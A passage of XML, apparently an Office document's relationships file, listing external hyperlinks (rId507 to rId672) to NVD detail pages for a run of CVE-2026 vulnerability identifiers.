Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97563" TargetMode="External" Id="rId507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97564" TargetMode="External" Id="rId508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97565" TargetMode="External" Id="rId509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97566" TargetMode="External" Id="rId510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97567" TargetMode="External" Id="rId511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97568" TargetMode="External" Id="rId512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97569" TargetMode="External" Id="rId513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97571" TargetMode="External" Id="rId514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97572" TargetMode="External" Id="rId515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97574" TargetMode="External" Id="rId516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97581" TargetMode="External" Id="rId517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97582" TargetMode="External" Id="rId518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97585" TargetMode="External" Id="rId519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97586" TargetMode="External" Id="rId520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97587" TargetMode="External" Id="rId521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97588" TargetMode="External" Id="rId522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97590" TargetMode="External" Id="rId523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97591" TargetMode="External" Id="rId524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97592" TargetMode="External" Id="rId525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97593" TargetMode="External" Id="rId526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97596" TargetMode="External" Id="rId527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97597" TargetMode="External" Id="rId528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97598" TargetMode="External" Id="rId529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97599" TargetMode="External" Id="rId530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97600" TargetMode="External" Id="rId531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97601" TargetMode="External" Id="rId532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97603" TargetMode="External" Id="rId533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97604" TargetMode="External" Id="rId534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97605" TargetMode="External" Id="rId535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97606" TargetMode="External" Id="rId536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97607" TargetMode="External" Id="rId537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97610" TargetMode="External" Id="rId538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97613" TargetMode="External" Id="rId539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97614" TargetMode="External" Id="rId540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97615" TargetMode="External" Id="rId541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97616" TargetMode="External" Id="rId542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97617" TargetMode="External" Id="rId543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97618" TargetMode="External" Id="rId544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97619" TargetMode="External" Id="rId545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97620" TargetMode="External" Id="rId546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97621" TargetMode="External" Id="rId547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97622" TargetMode="External" Id="rId548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97899" TargetMode="External" Id="rId549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97900" TargetMode="External" Id="rId550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97901" TargetMode="External" Id="rId551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97902" TargetMode="External" Id="rId552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97904" TargetMode="External" Id="rId553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97905" TargetMode="External" Id="rId554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97906" TargetMode="External" Id="rId555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97907" TargetMode="External" Id="rId556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97908" TargetMode="External" Id="rId557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97909" TargetMode="External" Id="rId558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97912" TargetMode="External" Id="rId559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97913" TargetMode="External" Id="rId560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97914" TargetMode="External" Id="rId561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97915" TargetMode="External" Id="rId562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97916" TargetMode="External" Id="rId563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97917" TargetMode="External" Id="rId564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97918" TargetMode="External" Id="rId565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97919" TargetMode="External" Id="rId566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97920" TargetMode="External" Id="rId567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97921" TargetMode="External" Id="rId568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97922" TargetMode="External" Id="rId569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97923" TargetMode="External" Id="rId570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97924" TargetMode="External" Id="rId571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97925" TargetMode="External" Id="rId572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97927" TargetMode="External" Id="rId573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97928" TargetMode="External" Id="rId574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97929" TargetMode="External" Id="rId575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97930" TargetMode="External" Id="rId576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97932" TargetMode="External" Id="rId577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97933" TargetMode="External" Id="rId578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97934" TargetMode="External" Id="rId579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97935" TargetMode="External" Id="rId580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97936" TargetMode="External" Id="rId581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97938" TargetMode="External" Id="rId582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97939" TargetMode="External" Id="rId583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97942" TargetMode="External" Id="rId584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97943" TargetMode="External" Id="rId585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97944" TargetMode="External" Id="rId586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97945" TargetMode="External" Id="rId587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97946" TargetMode="External" Id="rId588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97947" TargetMode="External" Id="rId589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97948" TargetMode="External" Id="rId590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97949" TargetMode="External" Id="rId591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97950" TargetMode="External" Id="rId592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97951" TargetMode="External" Id="rId593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97952" TargetMode="External" Id="rId594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97954" TargetMode="External" Id="rId595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97955" TargetMode="External" Id="rId596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97956" TargetMode="External" Id="rId597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97958" TargetMode="External" Id="rId598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97959" TargetMode="External" Id="rId599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97960" TargetMode="External" Id="rId600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97961" TargetMode="External" Id="rId601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97962" TargetMode="External" Id="rId602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97963" TargetMode="External" Id="rId603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97964" TargetMode="External" Id="rId604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97965" TargetMode="External" Id="rId605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97966" TargetMode="External" Id="rId606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97967" TargetMode="External" Id="rId607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97968" TargetMode="External" Id="rId608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97969" TargetMode="External" Id="rId609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97970" TargetMode="External" Id="rId610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97972" TargetMode="External" Id="rId611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97973" TargetMode="External" Id="rId612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97974" TargetMode="External" Id="rId613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97975" TargetMode="External" Id="rId614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97976" TargetMode="External" Id="rId615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97977" TargetMode="External" Id="rId616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97978" TargetMode="External" Id="rId617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97979" TargetMode="External" Id="rId618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97980" TargetMode="External" Id="rId619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97981" TargetMode="External" Id="rId620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97982" TargetMode="External" Id="rId621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97983" TargetMode="External" Id="rId622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97984" TargetMode="External" Id="rId623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97985" TargetMode="External" Id="rId624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97986" TargetMode="External" Id="rId625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97987" TargetMode="External" Id="rId626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97988" TargetMode="External" Id="rId627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97989" TargetMode="External" Id="rId628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97992" TargetMode="External" Id="rId629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97993" TargetMode="External" Id="rId630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97994" TargetMode="External" Id="rId631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97995" TargetMode="External" Id="rId632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97996" TargetMode="External" Id="rId633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97997" TargetMode="External" Id="rId634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97998" TargetMode="External" Id="rId635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98000" TargetMode="External" Id="rId636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98001" TargetMode="External" Id="rId637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98003" TargetMode="External" Id="rId638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98004" TargetMode="External" Id="rId639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98005" TargetMode="External" Id="rId640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98006" TargetMode="External" Id="rId641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98007" TargetMode="External" Id="rId642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98008" TargetMode="External" Id="rId643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98009" TargetMode="External" Id="rId644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98010" TargetMode="External" Id="rId645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98011" TargetMode="External" Id="rId646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98012" TargetMode="External" Id="rId647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98013" TargetMode="External" Id="rId648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98014" TargetMode="External" Id="rId649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98015" TargetMode="External" Id="rId650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98016" TargetMode="External" Id="rId651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98018" TargetMode="External" Id="rId652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98019" TargetMode="External" Id="rId653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98020" TargetMode="External" Id="rId654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98021" TargetMode="External" Id="rId655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98022" TargetMode="External" Id="rId656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98024" TargetMode="External" Id="rId657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98025" TargetMode="External" Id="rId658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98026" TargetMode="External" Id="rId659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98028" TargetMode="External" Id="rId660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98031" TargetMode="External" Id="rId661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98032" TargetMode="External" Id="rId662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98033" TargetMode="External" Id="rId663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98034" TargetMode="External" Id="rId664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98035" TargetMode="External" Id="rId665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98036" TargetMode="External" Id="rId666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98037" TargetMode="External" Id="rId667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98038" TargetMode="External" Id="rId668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98039" TargetMode="External" Id="rId669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98040" TargetMode="External" Id="rId670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98042" TargetMode="External" Id="rId671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98043" TargetMode="External" Id="rId672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 